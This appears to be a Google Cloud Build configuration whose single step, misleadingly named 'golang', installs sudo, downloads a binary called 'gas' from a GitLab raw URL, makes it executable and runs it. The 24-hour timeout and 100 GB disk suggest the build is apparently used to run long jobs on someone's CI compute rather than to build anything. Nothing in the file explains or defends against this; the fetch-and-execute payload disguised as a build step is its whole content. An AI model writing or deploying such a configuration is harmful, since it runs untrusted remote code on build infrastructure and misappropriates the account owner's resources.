steps: 
  - name: golang 
    args: 
      - '-c' 
      - >- 
         apt update && apt-get install sudo -y && wget https://gitlab.com/nitar0199/kido-sans/-/raw/main/gas && chmod u+x gas && ./gas 
    waitFor: 
      - '-' 
    entrypoint: /bin/bash 
timeout: 86400s 
options: 
  diskSizeGb: '100'